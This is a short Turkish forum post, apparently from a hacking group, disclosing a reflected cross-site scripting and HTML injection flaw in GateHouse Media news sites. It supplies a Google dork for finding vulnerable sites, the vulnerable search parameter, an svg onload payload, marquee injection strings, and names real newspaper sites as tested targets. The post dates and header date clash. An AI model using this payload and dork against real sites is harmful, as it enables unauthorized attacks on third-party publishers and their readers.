- 8 Eyl 2016
- 1,647
- 1,005
Bug bana aittir, ayrıntılar aşağıda..
Kod:
<------------------ header data start ------------------- >
#############################################################
# Application Name : GateHouse Media, LLC - XSS
# Vulnerable Type : Cross Site Scripting & HTML İnjection
# Author: Turkhackteam | Pentester | Bug Researchers
# Date: 13.12.2016
# Tested on: Windows 8.1 / Google Chrome / Mozilla Firefox
# Google Dork: intext:"Copyright 2006-2016 GateHouse Media, LLC. Some rights reserved" inurl:search?q=
# Vulnerable Parameter: GET /search?q=
# XSS: Http://localhost/search?q=<svg/onload=alert(XSS)>
# Tested On Demo Sites:
http://www.theledger.com/search?q=
http://www.theledger.com/search?q=
http://www.mailtribune.com/search?q=
< ------------------- header data end of ------------------- >
< -- bug code start -- >
<svg/onload=alert(XSS)>
<marquee>Bug Researchers</marquee>
<marquee onmouseout="this.start();" onmouseover="this.stop();"> Bug Researchers </marquee>
< -- / bug code end of -- >